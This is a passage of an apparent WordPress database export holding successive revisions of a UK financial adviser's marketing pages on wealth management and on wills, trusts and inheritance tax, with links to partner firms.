class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:16:35','2017-10-12 11:16:35','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(344,1,'2017-10-12 11:17:34','2017-10-12 11:17:34','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>Learn How to Manage Your Wealth and Investments</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to consider the financial products that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:17:34','2017-10-12 11:17:34','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(345,1,'2017-10-12 11:24:30','2017-10-12 11:24:30','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>Learn How to Manage Your Wealth and Investments</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. <a href=\"http://www.equalitywalk.org.uk/lump-sum-investment\">Smart investments</a> can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have<a href=\"http://www.equalitywalk.org.uk/pension-advice-will-you-have-enough-income-when-you-retire\"> savings for retiremen</a>t</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to <a href=\"http://www.equalitywalk.org.uk/investments-from-equity-smart\">consider the financial products</a> that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide<a href=\"http://www.chartwell-investment.co.uk/contentcofunds-htm\" target=\"_blank\"> Independent Investment Advice</a></h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in residential property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n 	<li><a href=\"http://scottandpaterson.co.uk\" target=\"_blank\">qualified and experienced accountants</a> taking care of your finances</li>\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n 	<li>offer a range of <a href=\"http://swaleinsurance.co.uk\" target=\"_blank\">insurance options</a> for your peace of mind</li>\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:24:30','2017-10-12 11:24:30','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(346,1,'2017-10-12 11:25:06','2017-10-12 11:25:06','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>Learn How to Manage Your Wealth and Investments</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. <a href=\"http://www.equalitywalk.org.uk/lump-sum-investment\">Smart investments</a> can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have<a href=\"http://www.equalitywalk.org.uk/pension-advice-will-you-have-enough-income-when-you-retire\"> savings for retiremen</a>t</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to <a href=\"http://www.equalitywalk.org.uk/investments-from-equity-smart\">consider the financial products</a> that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\"><a href=\"http://www.chartwell-investment.co.uk/contentcofunds-htm\" target=\"_blank\">Independent Investment Advice</a></h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in residential property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n 	<li><a href=\"http://scottandpaterson.co.uk\" target=\"_blank\">qualified and experienced accountants</a> taking care of your finances</li>\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n 	<li>offer a range of <a href=\"http://swaleinsurance.co.uk\" target=\"_blank\">insurance options</a> for your peace of mind</li>\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:25:06','2017-10-12 11:25:06','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(348,1,'2018-05-11 10:55:25','2018-05-11 10:55:25','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-11 10:55:25','2018-05-11 10:55:25','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(349,1,'2018-05-11 10:55:43','2018-05-11 10:55:43','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-11 10:55:43','2018-05-11 10:55:43','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(350,1,'2018-05-11 10:58:02','2018-05-11 10:58:02','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n<h2>What else should you consider?</h2>\r\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\r\n\r\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-11 10:58:02','2018-05-11 10:58:02','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(351,1,'2018-05-11 11:07:05','2018-05-11 11:07:05','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest 